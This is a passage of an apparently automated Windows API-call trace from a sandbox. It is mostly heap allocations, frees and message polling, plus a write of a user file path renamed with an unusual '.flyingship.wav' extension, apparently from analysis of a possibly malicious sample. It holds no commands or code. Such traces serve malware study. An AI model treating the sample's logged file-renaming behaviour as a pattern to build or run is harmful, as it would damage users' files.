[0187.499] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0187.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0187.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0187.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0187.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0187.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.flyingship.wav\r\n", cchWideChar=101, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 101 [0187.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x65) returned 0x8e8320 [0187.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.flyingship.wav\r\n", cchWideChar=101, lpMultiByteStr=0x8e8320, cbMultiByte=101, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.flyingship.wav\r\n", lpUsedDefaultChar=0x0) returned 101 [0187.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0187.499] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0187.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8320 | out: hHeap=0x8a0000) returned 1 [0187.499] WriteFile (in: hFile=0x120, lpBuffer=0x906f38*, nNumberOfBytesToWrite=0x64, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x906f38*, lpNumberOfBytesWritten=0x87f43c*=0x64, lpOverlapped=0x0) returned 1 [0187.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0187.500] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0187.500] CloseHandle (hObject=0x120) returned 1 [0187.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0187.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0187.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0187.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0187.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0187.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0187.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0187.501] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0187.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0187.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0187.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0187.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0187.503] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0187.503] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0187.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0187.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0187.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0187.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0187.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0187.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3478 | out: hHeap=0x8a0000) returned 1 [0187.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0187.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0187.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0187.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0187.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0187.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0187.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0187.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0187.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0187.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0187.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0187.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0187.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0187.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0187.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0187.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0187.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0187.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0187.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0187.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0187.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0187.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0187.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0187.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0187.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0187.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0187.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0187.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0187.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0187.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0187.504] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0187.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0187.504] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0187.504] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0187.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0187.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0187.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0187.515] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0187.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0187.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0187.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0187.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1960 [0187.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0187.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0187.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0187.515] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0187.515] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0187.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0187.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0187.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba180 [0187.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0187.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0187.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0187.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0187.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0187.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0187.516] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0187.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0187.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0187.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0187.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0187.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0187.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0187.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0187.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0187.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0187.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0187.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0187.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0187.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0187.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0187.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0187.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0187.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0187.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0187.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0187.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0187.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0187.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0187.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0187.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0187.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0187.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0187.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0187.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0187.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0187.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0187.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0187.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0187.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0187.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0187.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0187.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0187.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0187.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0187.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0187.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0187.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0187.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0187.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0187.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0187.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0187.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0187.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0187.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0187.518] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0187.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0187.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0187.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0187.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0187.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0187.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0187.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0187.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0187.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0187.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0187.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0187.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0187.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0187.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0187.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0187.519] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0187.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0187.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0187.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0187.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0187.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0187.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0187.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0187.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0187.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0187.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0187.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0187.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0187.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0187.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0187.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0187.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0187.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0187.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0187.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0187.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0187.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0187.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0187.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0187.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0187.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0187.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0187.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0187.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0187.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0187.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0187.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0187.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0187.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0187.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0187.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0187.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0187.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0187.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0187.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0187.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0187.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0187.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0187.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0187.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0187.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0187.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0187.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0187.521] RtlAllocateHeap 